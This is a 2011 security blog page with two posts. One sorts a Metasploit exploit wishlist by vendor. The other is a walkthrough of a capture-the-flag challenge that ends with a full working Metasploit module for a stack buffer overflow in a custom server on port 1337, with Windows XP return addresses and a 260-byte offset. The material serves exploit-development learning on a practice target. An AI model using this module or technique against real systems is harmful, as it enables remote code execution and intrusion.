Tuesday, February 15, 2011

from exploit db to metasploit

Couple of days ago, mubix at twitter posted a very nice link from http://cosine-security.blogspot.com/2011/02/metasploit-framework-wishlist.html . I got a few minutes today to separate the list a bit further so anybody that wants to work on it can look easier on things. The list is split according to vendors affected on the following files,

adobe
apple
centos
cisco
debian
fedora
google
hp
ibm
java
linux
microsoft
mozilla
oracle
others
php
proftpd
red_hat
solaris
suse
ubuntu
winamp

On the next few days I'm thinking to start porting some of them to metasploit modules and anybody that wants to do the same feel free to choose what you like to work on :)

List with vendors at http://chaos.deventum.com/research/0entropy.zip

Wednesday, February 9, 2011

From vulnerability to exploit under 5 min

Almost a month ago in the excellent group of NOVA Hackers! ( http://novahackers.blogspot.com/ ), a group of security professionals, security enthusiasts and friends a capture the flag challenge was posted. In that challenge one should find a way to exploit a binary file ( http://novactf.org/files/ctf-january-2011-files.rar ) that is listening on a specific port and write a metasploit exploit module . The ctf challenge was not meant to be extremely difficult it was meant to be for fun. Let's see how using the proper tools, one can write a metasploit, exploit, module under 5 min.

Tools that you will need, and tools that i like to work with,
Immunity Debugger ( http://www.immunityinc.com/products-immdbg.shtml )
Pvefindaddr ( http://redmine.corelan.be:8800/projects/pvefindaddr )
Metasploit Framework ( http://www.metasploit.com/framework/download/ )

Let's see how simple could be to write a simple buffer overflow with the proper tools.

Phase 1.
Fire up the debugger open the file,
Phase 2.
Start the executable from the debugger, pressing F9 or the run button.

Phase 3.
Generate a string of characters and send it to crash the application using metasploit
Phase 4.
At this point the application is crashed and the debugger will be displaying an Access Violation, for our good chance several registers are overwritten also with our string,
Phase 5.
Pvefindaddr to the rescue! This is almost considering cheating writing an exploit with the help of pvefinaddr, let's make it quick then, execute !pvefindaddr suggest on the debugger and check the log for the results.
What else could we ask from the tool, maybe to write the metasploit module by itself and post it on the exploit-db.com :-)

Phase 6.
Take the data and put them in a nice metasploit module. What is left here is a proper jmp eax instruction, pvefindaddr again will give us what we need.
Phase 7.
Take a simple metasploit exploit template ( http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ ) or from any other module in the metasploit directory add your values and you are done !

#
# Custom metasploit exploit
# Written by Nicolas Krassas
# Date 24/01/2011
# This is initial version
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Custom vulnerable server stack overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in a
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Nicolas Krassas' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP2 Eng',
                                          { 'Ret' => 0x662F3435, 'Offset' => 260 } ],
                                        ['Windows XP SP3 Eng',
                                          { 'Ret' => 0x662F3425, 'Offset' => 260 } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(1337)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(4) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end
end



Did it took 5 min, maybe not but it's neither far from it. Another nice tutorial on metasploit exploit code development using pvefindaddr that you can find is from sickness at Exploit Development Made Easy with !pvefindaddr .